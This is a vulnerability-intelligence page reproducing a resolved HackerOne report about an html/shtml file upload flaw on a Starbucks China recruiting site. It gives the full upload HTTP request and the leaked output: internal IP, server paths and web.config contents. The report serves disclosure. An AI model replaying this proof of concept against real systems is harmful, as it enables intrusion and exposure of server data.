Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

China - ecjobsdc.starbucks.com.cn html/shtml file upload vulnerability

High
S
Starbucks
Submitted None

Team Summary

Official summary from Starbucks

neweq discovered that ecjobsdc.starbucks.com.cn had a file upload vulnerability that permitted an attacker to upload html and shtml files which could then be accessed in a browser. @neweq — thank you for reporting this vulnerability.

Actions:
View on HackerOne
Reported by b006e4ea768a5d1b5340969

Vulnerability Details

Technical details and impact analysis

Privilege Escalation
### 1, Summary During the test, I found ecjobsdc.starbucks.com.cn this site has an upload vulnerability, you can upload html and shtml format files, so you can read the server's intranet IP, the physical address of the website application and read the website web.config file. ###2, Vulnerability scope https://ecjobsdc.starbucks.com.cn ###3, proof of exploit By modifying the suffix of filename, this address can be uploaded to upload html and shtml files, so that you can read the server's intranet IP, the physical address of the website application, and the configuration file of the website. Vulnerability certificate ``` POST /recruitjob/hxpublic_v6/hxinterface6.aspx?_hxcategory=hx_filebox_upload_file HTTP/1.1 Host: ecjobsdc.starbucks.com.cn Connection: close Content-Length: 234 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryevPInYidBxSvSd06 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 ------WebKitFormBoundaryevPInYidBxSvSd06 Content-Disposition: form-data; name="hxwebfileboxcontrol_upload_file_inputbox"; filename="xxx.shtml" Content-Type: text/html <?php echo 1111;> ------WebKitFormBoundaryevPInYidBxSvSd06-- ``` Successfully read the website's remoteaddr webpathinfo web.config file. ``` DOCUMENT_NAMED:\TrustHX\STBKSERM101\www_app\tempfiles\temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml SERVER_SOFTWARE :Microsoft-IIS/8.5 SERVER_NAME :ecjobsdc.starbucks.com.cn SERVER_PORT :80 REMOTE_ADDR:10.92.29.50 REMOTE_HOST:10.92.29.50 D:\TrustHX\STBKSERM101\www_app\tempfiles\temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml PATH_INFO:/recruitjob/tempfiles/temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 /recruitjob/tempfiles/temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <httpRedirect enabled="false" destination="https://ecjobs.starbucks.net" exactDestination="false" /> </system.webServer> </configuration> ``` {F349302} {F349303} ## Impact Phishing attack, remote file reading

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Privilege Escalation